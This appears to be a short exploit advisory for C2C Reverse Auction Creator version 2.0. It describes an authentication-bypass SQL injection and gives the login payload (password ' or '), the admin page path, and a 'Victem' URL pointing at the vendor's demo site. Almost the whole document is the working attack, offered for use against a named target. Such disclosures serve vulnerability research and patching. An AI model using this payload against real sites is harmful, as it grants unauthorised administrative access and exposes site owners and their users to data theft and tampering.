C2C Reverse Auction Creator version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
26c54383f3359cebee5e2a313b183a67c9c3492997e2950912c749a5d0eb6e88
#########################################################
---------------------------------------------------------
Portal Name: C2C Reverse Auction Creator
Version: 2.0
Vendor: http://www.etoshop.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Website: http://Pouya-Server.ir
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://site.com/[path]/casp/admin.asp
-----------------------------------
Victem :
http://www.etoshop.com/demo/C2CReverseAuction/reverse
---------------------------------------------------------
#########################################################